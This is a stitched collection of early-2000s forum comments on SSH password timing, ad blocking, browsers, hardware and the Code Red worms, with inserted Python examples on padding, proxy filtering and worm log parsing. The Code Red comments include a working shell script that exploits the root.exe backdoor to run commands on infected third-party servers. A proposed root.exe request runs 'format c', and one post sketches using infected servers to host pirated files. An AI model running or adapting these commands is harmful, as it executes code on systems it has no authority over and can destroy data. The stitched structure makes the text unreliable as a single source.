If the SSH client generates a tinygram for each character entered in the password, it would seem a simpler fix would be to buffer the entire password and only send it once the user hits Enter/Return/whatever. Instead of x tinygrams for an x-character password (more if you need to fix a typo), you would have just one with the entire password. Making all packets with passwords the same size (fill the dead space with noise) ought to help. You still can't do much to protect keystrokes once the session is going...using vi/emacs/trn/etc. in line-buffered mode would suck. Still, it would make passwords a little more secure.
(Then again, the above could be completely off-base...I do graphics software, not security software. :-) )
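As an added example (not from the post above, and not SSH's actual wire format), here is the contrast in Python between per-keystroke frames, whose count alone gives away the password length, and buffering the whole password into one frame padded out to a fixed size with random filler. BLOCK, the two-byte length prefix and the function names are assumptions made for the example.

```python
import os
import struct

# Fixed payload size for a password frame; an assumption for this example,
# not a value taken from SSH.
BLOCK = 64

def keystroke_frames(password):
    """Per-keystroke behaviour the post objects to: one tiny frame per
    character typed. Counting frames on the wire gives the password
    length without decrypting anything."""
    return [c.encode() for c in password]

def padded_frame(password, block=BLOCK):
    """Line-buffered alternative: send the whole password once, in a frame
    of constant size. Layout: 2-byte big-endian length, the password, then
    random filler ('noise') out to the block size. Anything longer than
    block-2 bytes would need a second frame and leak that fact, so it is
    rejected here rather than silently truncated."""
    data = password.encode()
    room = block - 2
    if len(data) > room:
        raise ValueError("password longer than one fixed-size frame")
    return struct.pack(">H", len(data)) + data + os.urandom(room - len(data))

def unpad_frame(frame, block=BLOCK):
    """Receiver side: refuse frames that are not exactly one block (a short
    frame would mean the sender leaked length after all), then strip the
    filler using the length prefix."""
    if len(frame) != block:
        raise ValueError("frame is not exactly one block")
    (n,) = struct.unpack(">H", frame[:2])
    if n > block - 2:
        raise ValueError("length prefix exceeds frame")
    return frame[2:2 + n].decode()

def observed_lengths(frames):
    """What a passive observer gets from the wire: only the size of each frame."""
    return [len(f) for f in frames]
```

The receiver rejects anything that is not exactly one block, so a misbehaving sender cannot quietly fall back to variable-length frames. The fixed block also caps the password length, and, as the post says, none of this helps with the timing of the Enter key or with keystrokes sent once the interactive session is up.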
I am quite tired of some of the people on this site who are quick to criticize Slashdot for having downtime. I am willing to bet these same people probably have not had to face a pissed-off boss and manager breathing down their neck while trying to revive a mission-critical server that is "not supposed to fail".
And these same people probably don't realize that half your downtime is spent describing to your boss why some (very expensive, mind you) servers that are "not supposed to fail" are in pieces on the floor.
They're probably the same schmucks who wouldn't sign off on the backup software, the preventive-maintenance items, or whatever that would've prevented the downtime in the first place. Been there, done that. In most places, they're called "bean counters."
I know a few people who are running non-infected Web Servers and they're still getting a fair amount of traffic related to the Code Red (and variants) virus.
5877 attempts logged from 2140 hosts as of now. 129 of them are from today. It's tapered off, and a greater proportion is from other service providers, but it's still coming in. My server auto-responds to each attack attempt with a popup on the remote console.
from the parent:
This proves once again, that there still isn't a good browser for Linux. So we have to decide on which one is less crappy, and not which one is better.
Where on earth did you get that from? It wasn't from anything I posted. Put down the crack pipe, pay attention, and get your quotes straight before you post and make a fool of yourself.
(BTW, just did a check...it was two levels before my post. It's also currently scored 5, Insightful...that doesn't happen to troll posts.)
That's a troll.
Sounds more like an opinion with which you disagree...that doesn't make it a troll. In any case, it wasn't what I wrote. If you're responding to me (and /. says you are), I'd appreciate it if you didn't put words in my mouth. (FWIW, back when I was running Linux on the desktop (about a year ago), I had VMware running Win98 so that I could run IE...because there were no decent graphical browsers for Linux at the time. That may very well have changed; I have no recent experience with which to confirm or deny that.)
It's just as wrong as all these MSIE is great posts by the other Micro Terds around here.
That's nice...ever hear of using the right tool for the job? Stuff like this would make me embarrassed that I use Linux for anything...if I paid any heed to the zealots on either side.
This is a Linux news site, please refrain from singing MSIE praises all day long, as a quick review of your user page indicates you do.
<flame>
Pull your head out of your ass...where on this page did you get that idea? Besides, I thought /.'s banner was "news for nerds; stuff that matters." I guess all those articles on DMCA atrocities and Star Wars and *BSD and such don't belong here, if we're to believe you. Now would you just either get a clue or FOAD? </flame>
Learn the definition of "troll" before you start slinging that label around. Just because you can't figure out how to get NT and/or IE to run reliably doesn't make someone who can a troll. (It's really not that difficult...start with a clean, vanilla install, apply SP3, install IE 5.5 to replace the IE 2.x that comes with NT, and apply SP6a. Or something like that...it's been a while since I've needed to reinstall NT on a box.)
Besides, in what way does a positive comment on IE under Windows reflect negatively on Linux? Did I say anything against Linux? The last time I checked (which was several months ago), FWIW, Konqueror was getting to where it would be usable. I think the only page on which it choked was MSN, which is (somewhat) understandable. Maybe that's been fixed since then; I don't have a system right now on which I can check it. If I need to browse within Linux, I normally use Lynx, but that's because I run Linux headless on a server (no X). As for Nutscrape, it's caused me no end of grief as a website developer (its level of support for HTML and CSS is horribly behind the times) and I've heard more than a few complaints of crashes under multiple OSen. I won't let it come anywhere near any of my computers...whether they run Windows, MacOS, Linux, BSD, or whatever (yes, I have systems running all of those).
IE more stable? Since I started using Mozilla 0.9.3 it hasn't crashed yet, but IE 5.5 crashes nearly every day at work, where I use WinNT4. (Nothing a simple kill and restart doesn't fix.)
Something must be seriously ate-up with your system if IE is causing problems like that. I run IE 5.5 on Win2K Pro SP2 and it Just Doesn't Crash.
If you want to argue that this software is not being consented to...
That's a big part of what this discussion is about (that, and replacing one ad with another, which is what Madison Avenue ought to get hot and bothered about).
Oh, and one more thing:
It's unethical to block ads. Don't like them? Don't visit sites that use them. Else, you are stealing.
Let me guess...you never hit fast-forward or mute when an ad comes up on TV. If you do, then please explain how running an ad filter is any different.
Are you saying, then, that you have no problem with "hijackware" that is surreptitiously (read that as "without your knowledge or consent") installed on your computer and works behind the scenes to alter the appearance (and possibly the functionality) of a website? I set up Squid to block ads from most third-party sources (if a site serves up its own ads, I usually don't bother adding it to the list unless it's really annoying). I know it's doing that because I set it up to do that.
That is exactly what fair use is all about.
What a load of bull. From what part of the fair-use doctrine do you get the idea that hijackware is in any way legitimate? The last time I checked, the fair-use doctrine allows you to excerpt copyrighted materials for educational or critical purposes, and to make full copies for backup purposes (as with software) or to enable usage of copyrighted material in a different device (as in copying a CD to tape or ripping it to MP3 for playback in your car's tape deck or your MP3 player). Parody is also generally protected, and editing for personal use (as in doing your own remix) is accepted...but these are actions that you undertake of your own free will. Please explain, for the edification of all /.ers, how hijackware fits into fair use.
As for your sig WRT ad-blocking...if I didn't have to worry about third parties following my every click, maybe I'd consider shutting down Squid. When I go to fubar.com, I've consented for fubar.com to send content (including potentially harmful scripts) to my computer. That consent doesn't extend to DoubleClick, Aureate, or other third parties (note the previous remark about usually not blocking ads served up by a website's server...if fubar.com has its own banner, it'll usually get through). Also, what about the people who use Lynx...do you consider them to be without scruples because their browser will never display that inane "punch the monkey" banner?
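The filtering policy the post describes, written out as an added example in Python rather than the poster's actual Squid configuration: ads from listed third-party hosts are dropped, while a site serving its own banners is left alone. The blocklist is constructed for the example (the post names DoubleClick and Aureate; adnet.example is made up), and reducing a hostname to its last two labels is a simplification noted in the code. The squid_acl_lines helper emits the destination-domain half of the same policy in squid.conf syntax.

```python
from urllib.parse import urlsplit

# Constructed blocklist for this example. The post names DoubleClick and
# Aureate; the third entry is a made-up ad network used only for testing.
AD_DOMAINS = ("doubleclick.net", "aureate.com", "adnet.example")

def site_of(host):
    """Reduce a hostname to its registrable part, taken here as the last
    two labels (ads.fubar.com -> fubar.com). Assumption: no multi-label
    public suffixes such as co.uk; a real filter would consult the public
    suffix list instead."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def is_ad_host(host):
    """True when host is a listed ad domain or any subdomain of one."""
    h = host.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in AD_DOMAINS)

def classify(request_url, referer=None):
    """Decide what to do with one proxied request.

    'first-party' : same site as the page that triggered it; always allowed,
                    which is the post's "if a site serves its own ads, fine"
    'blocked'     : cross-site (or referer-less) fetch from a listed ad host
    'third-party' : cross-site fetch from anywhere else; allowed

    A request with no Referer (Lynx, a typed URL) is not first-party to
    anything, so a listed ad host is still blocked in that case."""
    req_host = urlsplit(request_url).hostname or ""
    if referer:
        ref_host = urlsplit(referer).hostname or ""
        if site_of(ref_host) == site_of(req_host):
            return "first-party"
    return "blocked" if is_ad_host(req_host) else "third-party"

def squid_acl_lines(domains=AD_DOMAINS):
    """The destination-domain half of the same policy as squid.conf lines.
    A leading dot on a dstdomain entry makes it match subdomains as well.
    The Referer-based first-party exception above has no dstdomain
    equivalent; that is the part this ACL alone cannot express."""
    acl = "acl ads dstdomain " + " ".join("." + d for d in domains)
    return [acl, "http_access deny ads"]
```

Only the "blocked" verdict drops a request; "third-party" is reported separately so that the log shows which cross-site fetches the policy chose to let through.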
Yeah right. It's like that crap RealPlayer. When I installed it, it specifically had options for whether or not you want RealPlayer to run on startup and sit in the taskbar. I *made sure* that this option was not selected. It completely ignores the option, it runs on startup anyway and sits in the taskbar.
You think that's bad? An older version installed AIM on my computer once. I don't want any of AOHell's crap on my computer. I don't use Nutscrape. I don't use AIM or ICQ (or any other messaging system, for that matter...last time I used IRC was probably a decade ago). I don't use Winamp anymore (tho' it was pretty cool before Nullsoft got swallowed up). I fired off a nastygram to Real about it, and it seems that it's not in current versions (at least not in the basic download that's available).
Unfortunately, it seems like this is going to come up again and again. The best solution I can think of is an HTML meta tag or HTTP header like "HTTP-Dont-Fuck-With: yes".
Microsoft already has something similar for its smart tags:
<meta name="MSSmartTagsPreventParsing" content="TRUE">
I have this in the template for my website, so it appears on all my pages. I also just added in this little blurb to go along with the copyright notice at the bottom:
This is an ad-free website. If advertising material appears on any page in this website, it indicates that you have software installed on your computer (probably without your knowledge) that is inserting the ads. Such defacement is a violation of copyright, and I'd appreciate it if you'd contact me [there's an email link here] so that we can figure out what software is interfering with your browsing experience and so that I can go after the company that's responsible for this defacement.
You might consider something similar for your own websites, especially if yours is ad-free by design (one of the joys of hosting your site on your own server on a cable-modem connection :-) ).
http://search.yahoo.com/bin/search?p=Apple+Assembly+Line
Compare the results to this search submitted to Google:
http://www.google.com/search?sourceid=navclient&q=Apple+Assembly+Line
(The first result is one of my pages. I made the rounds of several search engines a little while ago to check the page ranking. Yahoo is using Google's search results more or less unmodified.)
I own a Radeon 64 and I have yet to see a single ATI-related crash (running on Windows 2000).
Likewise...I'm running a Radeon 32MB DDR under Win2K, and I had an Xpert 98 (Rage Pro) before that which got used with Win98 and Linux (including XFree86). I've never had driver problems with any of them. Rage 128-based cards that I installed in other people's computers had some driver issues early on, but those have since been fixed.
Probably the only cards I've run across that consistently would not run reliably in anything were 3Dfx Voodoo Banshees (hell, I think you couldn't even get past the install without the damn thing locking up), and those (and the company that made them) are long gone.
Not just via motherboards -- unfortunately, anything with an AMD760 chipset too. :(
My understanding was that the latest versions of Linux and XFree86 were supposed to be able to run the Radeon on a 760 in more than just plain-vanilla VGA mode. I could be wrong, though...haven't tried it lately as I mostly run Win2K on that box.
I would also add a *BSD in the mix, if the original poster can try different distros.
Definitely not a bad idea to get something different in there. After finding that the most recent Debian ran unacceptably slow on my Quadra 610 (I don't remember Linux running that slow back when I was running it on a 486SLC-33, which is closest to this Mac in speed), I snagged a NetBSD ISO, burned it, and installed it (actually, it's still installing now...the hard drive is thrashing like crazy). For non-x86 platforms especially, NetBSD appears to have better hardware support. (Linux doesn't support sound, AppleTalk, or the IWM/SWIM floppy controllers in most Macs. I'm fairly sure NetBSD supports the sound and floppy controller...haven't looked much into AppleTalk yet.)
If you want to stick with Linux, you can't go wrong with SuSE. I've thrown it on several systems; it gets going without much fuss and has nearly everything you could want precompiled for it (it's an "everything including the kitchen sink" distro). Way back in the day, I used Slackware; it was a solid enough system, but I'm not sure it has the ease of installation or use that a raw beginner will want. (I had a few years' experience with other UN*X boxen before I picked up Linux back in '93 or so.)
(My personal favorite is LinuxFromScratch, but that's definitely not for greenhorns. :-) )
There's a rebuttal list to this comment made by the head of some automotive company.
It was GM. I don't think the list is on their site (but then I didn't go looking for it there), but Google came up with a few hits. This is a list of things with which to finish the phrase "If Microsoft built cars..." This is a hypothetical "GM helpdesk" taking lusers' questions as if cars were like computers (someone ought to do a BOFH version of this).
My first run-in with a NeXTcube was, if I recall the hostname correctly, mrcnext.cso.uiuc.edu (IP address reported as 128.174.68.206, but it isn't currently responding to ping...don't know if it's just shut off or if it's been decommissioned) back in 1989 or '90. In addition to the usual NeXT coolness, you could telnet into it and do the usual shell stuff with no time limits. uxa, the main student machine, had a 7-hour-per-week limit which I (and many of the people I knew) usually ran up against on Thursday or Friday (if not earlier). Having unlimited access (in terms of time...they didn't give us root) to mrcnext fixed that problem. (You could also stay logged into uxa past the seven-hour limit, but you were screwed if line noise killed your connection to the terminal server.)
Of course, getting in lots of time on the computers was probably the main reason my spring-semester grades weren't so hot...:-|
I should probably mention that if (like me) you're logging Apache traffic to MySQL with apachedb, you'll probably need to change the query to whatever requestid corresponds to /default.ida on your system. Going into MySQL and doing something like this:
use apache2
select id from request where request="/default.ida";
ought to work to get that info. Then again, if you're using apachedb, you've probably figured it out already, and I'm stupid for not having put this in the original post in any case. :-)
Maybe you should send it to more than just localhost... you'd have to check on a Windows box, but I think "net send /domain the server at $ip is infected by code red
I threw IIS onto my Win2K box (it sits behind a Linux firewall and only does workstation stuff) to play with different usernames. I considered sending to Administrator, but if nobody is logged in as an admin, nobody will see the message. Also, some shops change "Administrator" to something else, in which case sending to that name will fail altogether. (I'll allow that someone with the minimal clue needed to rename the admin account probably knows well enough to keep up on patches and updates, so this might not be a common occurrence.) Your suggestion to send to /domain only works if domain-based security is in use (presumably either the domain security in NT 4 or ActiveDirectory in Win2K). Most of the shops that are having problems with CodeRed probably don't know how to set up and manage domains.
Sending the popup to localhost, OTOH, makes reasonably sure the message gets to the server. It could be a problem if the server is stuck in a corner somewhere and nobody ever fires it up to check on it periodically.
I let the script loose this afternoon. For some reason, it only got to 229 hosts before conking out. (My CodeRed log page lists "3689 attempts logged from 1419 hosts" as of this writing. 2142 of those are from other lvcm.com customers.) Of those, it said 172 were down. Of the 57 that were up, 22 appear to have been fixed (Lynx came back with an error, probably because root.exe is gone from the CGI directory). 35 were still infected. 35 of 57...that's three out of five machines still opened wider than the goatse.cx guy, even after a week and a half.
(Posted without the +1 bonus because it's not entirely on-topic.)
I'll say "Intel sucks, RDRAM bites, DDR rocks and AMD RULES!" Go READ the datasheets for the P4 and the Athlon and come back and tell me which is better. But if you can't understand those datasheets, shut up, you're not entitled to an opinion. Hearsay does NOT count!
Um...between the above and the subject line you're using, I hope you didn't get the impression that I am some sort of Intel fanboy. Reread my post...it was a description of a certain Induhvidual who pestered a group on Usenet for several months. I've bought only AMD for the past four years or so, starting with a K6-200 and going up to a 1.0-GHz Athlon.
The folks on the Rambus board at The Motley Fool's message boards (www.fool.com) are positively frightening in their zealotry...
Not just the Fool...Yahoo is home to some foaming-at-the-mouth RMBS fanboys as well. Up until Rambus started losing in court, one of them also infested comp.sys.ibm.pc.hardware.chips. Never mind the demonstrated inferior performance of RDRAM in most applications and with most processors and chipsets; to this maroon, RDRAM and the P4 were the Second Coming while DDR SDRAM and the Athlon were "unstable dead-end junk" and "dead dead dead." Never mind that the Athlons I use at home and at work (a homebrew box at home and an HP Pavilion (!) at work) are among the fastest, most stable computers I've ever used...if you disagreed, you must've been an "AMDroid."
(None of this even gets into comp.sys.ibm.pc.hardware.chips as a technical newsgroup for discussing the merits of different processors, chipsets, etc., as opposed to a stock board...)
Re:Follow-up viruses? on Code Red III (Score: 2)
What's to keep someone from writing something that exploits this, looking for boxes that have been patched, and removing the patch - re-enabling the vulnerability to CR? Or surreptitiously opening additional services? Or hell, simply executing del (is that the command in DOS?) c:\?
NT and Win2K aren't DOS, but DEL is in there. DELTREE is also in NT IIRC, but it isn't in Win2K (not that it'd be hard to copy over Win98's DELTREE and use that).
An infected server sounds like the ideal place to throw up a warez/pr0n/mp3z site on someone else's nickel...use ftp.exe to fetch a batch file that then builds a directory structure and pulls the files (or "filez," since it's that kind of site) over. If they're too stupid to have patched against CodeRed2, they're probably too stupid to check their logs to find out why their available bandwidth has apparently shrunk to nothing. It'd be an interesting idea to try out, if I had no sense of moral inhibition and/or didn't think I'd get caught. :-)
Besides, if it's the site of a company you don't particularly like, imagine what would happen if the SPA or BSA came knocking and found Office XP ISOs available for download at http://www.fubared-company.com/warez...
Re:More information? on Code Red III (Score: 5, Informative)
Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.
Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.
That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.
I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.
Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:
#!/bin/sh
# Empty http_proxy so lynx talks to each host directly instead of through the local Squid.
http_proxy=
# Hosts that requested /default.ida (requestid 2058 in this apachedb database) since
# the end of July; sort/uniq collapses repeat offenders and grep drops the column header.
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-07-31";') | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
# One ping with a three-second wait; "100% packet loss" means skip this host.
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
echo host is down.
else
# Ask the root.exe backdoor CodeRed2 leaves in /scripts to run "net send localhost ..."
# so the message pops up on the infected server's own console. The backslash-newlines
# are shell line continuations; the continued lines must start in column 0.
lynx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+%22Your+web+server+has+been+infected+with+the+CodeRed2+worm.\
+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.\
+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.\
++Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live,\
+though+c:%5Cinetpub%5Cscripts+is+the+default+location\).%22 >/dev/null
echo message sent.
fi
done
Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.
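Both the apachedb query earlier (picking the requestid for /default.ida) and the script above (pulling the hosts that made that request since July 31) rely on recognising worm requests in the web log. Here, as an added Python example and not the poster's code, is the same identification done directly on Apache common/combined log lines, separating the original Code Red (query string padded with N's) from Code Red II (padded with X's) and from later probes of the root.exe backdoor that Code Red II installs. The log lines are constructed, with the padding and the %u payload shortened, and the function names are assumptions made for the example.

```python
import re
from collections import Counter
from datetime import date, datetime

# Apache common/combined format. The query string stays inside the request
# field, which is where the worm's signature lives.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)

# Code Red v1/v2 padded the overlong default.ida query with N's; Code Red II
# used X's. Code Red II also dropped root.exe into the /scripts and /MSADC
# web directories, which is what later probes (and the script above) hit.
CODERED_RE = re.compile(r'^/default\.ida\?(N{8,}|X{8,})', re.IGNORECASE)
BACKDOOR_RE = re.compile(r'^/(?:scripts|msadc)/root\.exe(?:\?|$)', re.IGNORECASE)

def classify(path):
    """Return 'codered1', 'codered2', 'root.exe probe', or None."""
    m = CODERED_RE.match(path)
    if m:
        return "codered1" if m.group(1)[0].upper() == "N" else "codered2"
    if BACKDOOR_RE.match(path):
        return "root.exe probe"
    return None

def parse_line(line):
    """Return (client host, timestamp, request path), or None when the line
    is not in common/combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("host"), ts, m.group("path")

def summarize(lines, since=None):
    """Tally worm-related requests. Returns (attempts per class, set of
    client hosts per class). `since` is an ISO date string; entries dated
    before it are skipped, like the script's transfer.time condition."""
    since_date = date.fromisoformat(since) if since else None
    attempts = Counter()
    hosts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, ts, path = parsed
        if since_date is not None and ts.date() < since_date:
            continue
        kind = classify(path)
        if kind is not None:
            attempts[kind] += 1
            hosts.setdefault(kind, set()).add(host)
    return attempts, hosts

def still_infected_candidates(lines, since=None):
    """Sorted hosts that sent a Code Red II request: the list the script
    above feeds to ping and lynx."""
    _, hosts = summarize(lines, since)
    return sorted(hosts.get("codered2", set()))

# Constructed sample log. The N/X runs and the %u tail are shortened; the
# real requests carry a few hundred characters of padding.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jul/2001:14:03:11 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 295
192.0.2.10 - - [04/Aug/2001:21:17:05 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 295
198.51.100.7 - - [05/Aug/2001:03:40:52 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 295
198.51.100.7 - - [05/Aug/2001:03:41:00 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 291
203.0.113.44 - - [05/Aug/2001:09:12:30 -0700] "GET /index.html HTTP/1.1" 200 1043
"""

if __name__ == "__main__":
    attempts, hosts = summarize(SAMPLE_LOG.splitlines())
    total = sum(attempts.values())
    print("%d attempts logged from %d hosts" % (total, len(set().union(*hosts.values()))))
    for kind, n in attempts.items():
        print("  %-15s %3d attempts, %d hosts" % (kind, n, len(hosts[kind])))
```

A non-IIS server answers these with a 404 but still logs the full request line, so the N/X padding is visible in the log; requiring at least eight padding characters keeps an ordinary 404 for /default.ida from being counted as a worm hit.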